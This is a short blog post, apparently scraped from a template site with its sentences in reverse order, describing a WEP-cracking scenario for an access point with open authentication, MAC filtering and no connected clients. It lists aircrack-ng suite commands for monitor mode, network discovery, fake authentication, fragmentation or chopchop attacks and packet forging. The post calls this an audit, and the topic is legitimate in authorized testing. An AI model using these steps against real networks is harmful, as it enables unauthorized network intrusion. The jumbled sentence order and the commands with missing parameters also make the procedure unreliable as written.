![]() ![]() Use fragmentation or chopchop attack and generate a valid custom arp packet ( aireplay-ng –5 –b wireless_int_in_monitormode,aireplay-ng –4 –b –h wireless_int_in_monitor_mode, packetforge-ng…).Associate with AP ( airodump-ng –c –-ivs –w /tmp/filename wireless_int_in_monitormode, aireplay-ng –fakeauth 0 –a –h –e ESSID wireless_int_in_monitormode>). ![]() Find wireless network (BSSID and ESSID) ( airodump-ng wireless_interface_in_monitor_mode).Put wireless interface in monitor mode ( airmon-ng start wireless_interface).So assuming that there is no MAC filtering, or you have managed to get a valid MAC address of a client (earlier, or by bruteforcing mac addresses □ ), then this is what you can do if there are no active clients connected to the network at the time of the audit : I guess it makes the wireless network a bit safer, but a whole lot more useless as well. Ok, first of all, if MAC filtering is enabled and there are no active clients, it’s going to be difficult to get a valid MAC address that is allowed to associate with the AP. Scenario 2 : WEP encryption, OPEN Authentication, MAC filtering enabled (?), no active clients
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |